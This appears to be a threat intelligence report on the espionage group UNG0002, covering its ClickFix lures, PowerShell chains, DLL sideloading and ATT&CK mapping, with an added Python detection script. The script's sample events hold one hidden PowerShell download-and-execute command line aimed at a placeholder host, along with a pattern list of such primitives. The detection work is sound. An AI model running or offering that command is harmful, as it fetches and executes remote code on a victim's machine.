EXECUTIVE SUMMARY:
An espionage-focused threat cluster, designated UNG0002, has been observed conducting targeted cyber campaigns across multiple Asian jurisdictions, including China, Hong Kong, and Pakistan. This threat actor consistently targets a broad range of sectors such as defense, electrotechnical engineering, civil aviation, gaming, software development, academia, and medical institutions. UNG0002 employs sophisticated social engineering techniques, including the use of realistic decoy documents and fake CAPTCHA verification pages, to lure victims and facilitate payload execution. The group exhibits a high degree of operational security and persistence, maintaining a long-running presence with evolving tactics.
UNG0002 leverages complex infection chains that rely heavily on malicious shortcut (LNK) files, VBScript, batch scripts, and PowerShell to deploy custom remote access trojans (RATs) such as Shadow RAT, INET RAT, and Blister DLL implants. The actor abuses DLL sideloading by exploiting legitimate Windows applications like Rasphone and Node-Webkit binaries to stealthily execute malicious payloads. Their social engineering campaigns include spoofing official government websites, notably mimicking Pakistan's Ministry of Maritime Affairs, to trick victims into running malicious PowerShell scripts through fake CAPTCHA verification pages, a method known as the ClickFix technique. The group also uses highly targeted decoys, including fake resumes and profiles designed to appeal to game UI designers and computer science students from prestigious institutions. The command-and-control infrastructure shows consistent naming patterns, reflecting disciplined operational security across campaigns. Notably, PDB paths within malware samples hint at internal code names such as Mustang and ShockWave, indicating potential mimicry of established threat actor toolsets like Cobalt Strike and Metasploit.
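The two execution patterns described above, ClickFix (a user pastes a PowerShell one-liner into the Run dialog after a fake CAPTCHA prompt) and DLL sideloading through legitimate binaries such as Rasphone and Node-Webkit, both leave recognisable traces in process-creation and image-load telemetry. The following Python triage script is an added example, not code from the report or its authors: it applies two defender-side heuristics to a handful of constructed, Sysmon-like events. The event field names, file paths, the DLL name `version.dll` and the URL are all constructed for the example; treating `nw.exe` as the Node-Webkit executable name and `explorer.exe` as the parent of a Run-dialog launch are assumptions.

```python
"""Heuristic triage for ClickFix-style PowerShell launches and DLL sideloading.

Added example (not the report's code). Events are constructed, simplified
Sysmon-like dicts: type "process_create" carries image/parent_image/command_line,
type "image_load" carries image/loaded_dll. Field names are assumptions.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

# Directories from which a host binary and its DLLs are normally loaded.
# Anything outside these (Temp, Downloads, AppData, ...) is treated as user-writable.
TRUSTED_DIRS = (
    "c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
    "c:\\program files\\", "c:\\program files (x86)\\",
)
# Legitimate binaries the report names as sideloading hosts.
# rasphone.exe is the Windows RAS dialer; nw.exe is assumed to be the Node-Webkit binary.
SIDELOAD_HOSTS = {"rasphone.exe", "nw.exe"}
# ClickFix: the victim pastes into Win+R, so the shell (explorer.exe) is PowerShell's parent.
CLICKFIX_PARENTS = {"explorer.exe"}
# Download-and-execute / hiding primitives commonly seen on such one-liners (assumed markers).
CLICKFIX_MARKERS = re.compile(
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|"
    r"\biwr\b|invoke-webrequest|downloadstring|\bmshta\b", re.I)


@dataclass(frozen=True)
class Finding:
    event_id: int
    rule: str
    detail: str


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _dirname(path: str) -> str:
    # Normalised directory with trailing backslash so prefix checks are unambiguous.
    return ntpath.dirname(path).lower().rstrip("\\") + "\\"


def detect_clickfix(ev: dict) -> Optional[Finding]:
    """PowerShell spawned directly by the shell with download/hide markers on the command line."""
    if ev.get("type") != "process_create":
        return None
    if _basename(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    parent = _basename(ev["parent_image"])
    if parent not in CLICKFIX_PARENTS:
        return None
    m = CLICKFIX_MARKERS.search(ev.get("command_line", ""))
    if not m:
        return None
    return Finding(ev["id"], "clickfix",
                   f"PowerShell spawned by {parent} with marker {m.group(0)!r}")


def detect_sideload(ev: dict) -> Optional[Finding]:
    """A known sideloading host running outside trusted dirs loads a DLL from its own directory."""
    if ev.get("type") != "image_load":
        return None
    host = _basename(ev["image"])
    if host not in SIDELOAD_HOSTS:
        return None
    host_dir, dll_dir = _dirname(ev["image"]), _dirname(ev["loaded_dll"])
    if host_dir.startswith(TRUSTED_DIRS):
        return None  # legitimate install location; co-located DLLs are expected there
    if dll_dir != host_dir:
        return None  # DLL resolved from elsewhere, not the classic side-by-side layout
    return Finding(ev["id"], "sideload",
                   f"{host} in user-writable dir {host_dir} loaded {_basename(ev['loaded_dll'])}")


def triage(events: List[dict]) -> List[Finding]:
    findings = []
    for ev in events:
        for rule in (detect_clickfix, detect_sideload):
            f = rule(ev)
            if f:
                findings.append(f)
    return findings


# Constructed sample telemetry (not real IoCs).
SAMPLE_EVENTS = [
    # 1: ClickFix pattern: explorer.exe (Win+R) spawns hidden PowerShell that fetches and runs code.
    {"id": 1, "type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iwr http://example.invalid/verify | iex"'},
    # 2: Routine admin use from a console, no download primitives: should not fire.
    {"id": 2, "type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell -File C:\Scripts\inventory.ps1"},
    # 3: Sideload pattern: rasphone.exe copied to Temp loads a DLL placed beside it.
    {"id": 3, "type": "image_load",
     "image": r"C:\Users\victim\AppData\Local\Temp\rasphone.exe",
     "loaded_dll": r"C:\Users\victim\AppData\Local\Temp\version.dll"},
    # 4: Legitimate rasphone.exe in System32 loading a system DLL: should not fire.
    {"id": 4, "type": "image_load",
     "image": r"C:\Windows\System32\rasphone.exe",
     "loaded_dll": r"C:\Windows\System32\version.dll"},
    # 5: Node-Webkit binary dropped with a fake profile in Downloads loading a co-located DLL.
    {"id": 5, "type": "image_load",
     "image": r"C:\Users\victim\Downloads\profile\nw.exe",
     "loaded_dll": r"C:\Users\victim\Downloads\profile\version.dll"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.event_id}: [{f.rule}] {f.detail}")
```

The sideload rule deliberately keys on location rather than on DLL name, because a sideloaded binary is usually copied next to its malicious DLL into a user-writable folder, while the same binary in System32 or Program Files loads co-located DLLs legitimately; in production both rules need tuning against the environment's baseline (signed-image checks and parent-process allowlists are the usual next step).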
UNG0002 represents a capable and adaptive threat actor with a long-term focus on cyber-espionage. Their operations reflect a mature understanding of both technical exploitation and human-centric attack vectors. The group maintains a persistent targeting strategy, backed by evolving malware toolsets and evasive techniques. With a clear emphasis on sensitive sectors and a proven ability to adapt and mimic other threat groups' methodologies, UNG0002 poses a sustained risk to organizations across the region. Ongoing monitoring and in-depth threat intelligence analysis remain essential to counter this evolving cluster.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
|---|---|---|---|
| Reconnaissance | T1598.002 | Phishing for Information | Spearphishing Attachment |
| Resource Development | T1587.001 | Develop Capabilities | Malware |
| | T1583.001 | Acquire Infrastructure | Domains |
| | T1583.006 | Acquire Infrastructure | Web Services |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| | T1189 | Drive-by Compromise | |
| Execution | T1059.005 | Command and Scripting Interpreter | Visual Basic |
| Defense Evasion | T1027.002 | Obfuscated Files or Information | Software Packing |
| | T1202 | Indirect Command Execution | |
| Credential Access | T1056.001 | Input Capture | Keylogging |
| Discovery | T1082 | System Information Discovery | |
| Collection | T1005 | Data from Local System | |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| | T1105 | Ingress Tool Transfer | |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | |
REFERENCES:
The following reports contain further technical details: